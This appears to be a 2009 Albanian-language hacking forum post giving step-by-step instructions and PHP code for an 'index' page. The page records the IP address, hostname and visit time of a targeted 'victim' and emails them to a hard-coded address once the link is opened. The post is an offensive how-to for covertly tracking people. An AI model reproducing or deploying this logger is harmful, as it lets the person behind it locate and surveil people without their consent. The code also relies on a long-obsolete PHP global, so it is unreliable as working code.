...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Si Te Hapim Nje Index qe ta gjen IP e Viktimes

Shko poshtë 
AutoriMesazh
lumi-g
Administrator
Administrator
avatar

Numri i postimeve : 457
Join date : 26/04/2009
Age : 23

MesazhTitulli: Si Te Hapim Nje Index qe ta gjen IP e Viktimes   Tue Apr 28, 2009 12:22 pm

Si Te Hapim Nje Index qe ta gjen IP e Viktimes

Fillojm....

Hapim Notepadose

shkojm Start - Run - NOTEPAD.EXE

edhe ja qesim kete kodKodi:

<?
$ip = $REMOTE_ADDR;
$host =

gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "ast.crew@gmail.com";
$sujet = "Ip + Host";
$message =

"Moment : $date
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo

"Ownneeed";}
else { echo "Shit ?";}

e ruejm Save AS ....Index.php


e uploadoni ne host


Mandej

shkojm ne hostin ku e keni uploadu psh. http://www.hosti.com/index.php
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Si Te Hapim Nje Index qe ta gjen IP e Viktimes
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Hacking-
Kërce tek: